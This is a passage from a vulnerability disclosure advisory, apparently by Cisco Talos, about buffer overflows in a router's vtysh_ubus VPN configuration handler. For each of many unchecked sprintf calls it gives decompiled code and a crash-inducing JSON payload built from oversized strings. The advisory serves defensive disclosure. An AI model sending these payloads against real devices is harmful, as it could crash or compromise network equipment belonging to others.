[...]
if (table_value != (char *)0x0) {
remote_mask = (char *)blobmsg_data(table_value);
}
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_l2tp",
"function": "set",
"values": [
{
"base": "yruo_vpn_l2tp",
"index": 1,
"value": {
"remote_subnet": "A"*0x300,
"remote_mask": "A",
}
}
]
}
the vpn_l2tp_handler_set function is the entry point for one of the functionality. This function will eventually call the set_l2tp function.
In the set_l2tp function the key JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"key");
[...]
if ((is_equal == 0) && ([...], table_value != (char *)0x0)) {
key = (char *)blobmsg_data(table_value);
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"secret %s",key);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_l2tp",
"function": "set",
"values": [
{
"base": "yruo_vpn_l2tp",
"index": 1,
"value": {
"key": "A"*0x300,
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the expert_options JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"expert_options");
if (is_equal != 0) {
[...]
}
expert_options = blobmsg_get_string(table_value);
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"options %s",expert_options);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"expert_options": "A"*0x600,
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the remote_ip, port JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"remote_ip");
if (is_equal == 0) {
remote_ip = blobmsg_get_string(table_value);
[...]
}
[...]
is_equal = strcmp(table_key,"port");
if (is_equal == 0) {
port = blobmsg_get_u32(table_value);
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip remote server %s port %d",remote_ip,port);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_ip": "A"*0x600,
"port": 1,
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the local_virtual_ip, remote_virtual_ip JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal == 0) {
local_virtual_ip = (char *)blobmsg_get_string(table_value);
is_equal = strcmp(table_key,"remote_virtual_ip");
if (is_equal == 0) {
remote_virtual_ip = (char *)blobmsg_get_string(table_value);
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address static local %s peer %s",local_virtual_ip,remote_virtual_ip);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"local_virtual_ip": "A"*0x600,
"remote_virtual_ip": "POC",
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the local_virtual_ip and local_virtual_mask JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal != 0) {
[...]
}
local_virtual_ip = (char *)blobmsg_get_string(table_value);
[...]
is_equal = strcmp(table_key,"local_virtual_mask");
if (is_equal == 0) {
local_virtual_mask = (char *)blobmsg_get_string(table_value);
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address static local %s mask %s",local_virtual_ip,local_virtual_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"local_virtual_mask": "A"*0x600,
"local_virtual_ip": "POC",
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the username and password JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"username");
if (is_equal == 0) {
username = (char *)blobmsg_get_string(table_value);
[...]
}
[...]
is_equal = strcmp(table_key,"password");
if (is_equal == 0) {
password = (char *)blobmsg_get_string(table_value);
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"username %s password %s",username,password);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"username": "A"*0x600,
"password": "POC",
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the remote_subnet and remote_mask JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
[...]
if (table_value != (char *)0x0) {
remote_subnet = (char *)blobmsg_data(table_value);
}
}
else {
is_equal = strcmp(table_key,"remote_mask");
[...]
if ((is_equal == 0) && ([...], table_value != (char *)0x0)) {
remote_mask = (char *)blobmsg_data(table_value);
}
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_pptp",
"function": "set",
"values": [
{
"base": "yruo_vpn_pptp",
"index": 1,
"value": {
"remote_subnet": "A"*0x600,
"remote_mask": "POC",
}
}
]
}
the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function.
in the set_dmvpn function the cisco_secret JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"cisco_secret");
if (is_equal == 0) {
cisco_secret = (char *)blobmsg_get_string(table_value);
if (*cisco_secret != '\0') {
command_format_string = "ip nhrp authentication %s";
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,cisco_secret);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"cisco_secret": "A"*0x600,
}
}
]
}
the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_ike_profile function.
In the set_ike_profile function the secrets_local JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"secrets_local");
if (is_equal == 0) {
if(version == 1){
command_argument = blobmsg_get_string(table_value);
command_format_string = "pre-shared-key %s";
}
else{
if(version == 2){
command_argument = blobmsg_get_string(table_value);
command_format_string = "pre-shared-key local %s";
}
}
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 7,
"execute": 1,
"core": "yruo_vpn_ipsec_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_ipsec_client",
"index": 1,
"value": {
"secrets_local": "A"*0x300,
"version": 1,
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the old_remote_subnet, old_remote_mask JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
action = blobmsg_get_u32(table_value);
}
else {
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
remote_subnet = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
remote_mask = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"old_remote_subnet");
if (is_equal == 0) {
old_remote_subnet = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"old_remote_mask");
if (is_equal == 0) {
old_remote_mask = blobmsg_get_string(table_value);
}
}
}
} Eventually the following portion of code is reached:
if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
if (action == 2) {
if (old_remote_mask == 0 || old_remote_subnet == 0) goto OTHER_BRANCH;
sprintf(vtysh_command_buffer,"no remote subnet %s mask %s",old_remote_subnet,old_remote_mask);
[...]
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_subnet":[{
"remote_mask":"",
"remote_subnet":"",
"old_remote_subnet": "A"*0x600,
"old_remote_mask": "POC",
"action":2,
}]
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the remote_subnet, remote_mask JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
action = blobmsg_get_u32(table_value);
}
else {
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
remote_subnet = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
remote_mask = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"old_remote_subnet");
if (is_equal == 0) {
old_remote_subnet = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"old_remote_mask");
if (is_equal == 0) {
old_remote_mask = blobmsg_get_string(table_value);
}
}
}
} Eventually the following portion of code is reached:
if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
if (action == 2) {
if (old_remote_mask == 0 || old_remote_subnet == 0) goto OTHER_BRANCH;
[...]
sprintf(vtysh_command_buffer,"remote subnet %s mask %s",remote_subnet,remote_mask);
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_subnet":[{
"remote_mask":"A"*0x600,
"remote_subnet":"",
"old_remote_subnet": "",
"old_remote_mask": "",
"action":2,
}]
}
}
]
}
the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function the remote_subnet, remote_mask JSON keys is used to fetch its respective values:
is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
action = blobmsg_get_u32(table_value);
}
else {
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
remote_subnet = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
remote_mask = blobmsg_get_string(table_value);
}
[...]
}
Eventually the following portion of code is reached:
if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
if (action == 2) {
[...]
}
else {
if (action == 3) {
command_format_string = "no remote subnet %s mask %s";
}
else {
if (action == 1){
command_format_string = "remote subnet %s mask %s";
}
else{
[...]
}
}
sprintf(vtysh_command_buff,command_format_string,remote_subnet,remote_mask);
}
[...]
} The format string used will depends on the value of the `action` variable.
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_subnet":[{
"remote_mask":"A"*0x600,
"remote_subnet":"",
"action":3,
}]
}
}
]
}
Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html
2023-02-14 - Initial Vendor Contact
2023-02-21 - Vendor Disclosure
2023-07-06 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.